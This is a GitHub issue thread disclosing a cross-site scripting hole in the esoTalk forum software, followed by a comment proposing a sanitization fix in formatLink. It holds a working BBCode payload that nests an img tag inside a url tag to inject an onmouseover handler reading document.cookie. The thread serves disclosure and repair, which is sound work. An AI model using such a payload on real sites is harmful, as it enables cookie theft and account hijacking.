### ISSUE TITLE
esotalk topic xss vulnerability

### ISSUE THREAD

**Issue by evi1m0** [esotalk/esoTalk#377]
### Payload:

```
[url=[img]onmouseover=alert(document.cookie);//://example.com/image.jpg#"aaaaaa[/img]]evi1m0[/url]
```
### Proof:

![](http://1.hackersoul.sinaapp.com/img/media/37D2E7A3-8A88-4CE2-9E3E-E2688CC5C946.png)

**Comment by andrewks777** [comment]
Fix:

https://github.com/esotalk/esoTalk/blob/develop/core/lib/ETFormat.class.php
public function formatLink($url, $text = null)
public function formatLink($url, $text = null)
{
if ($text === null) $text = $url;
$url = sanitizeHTML($url);
$text = sanitizeHTML($text);
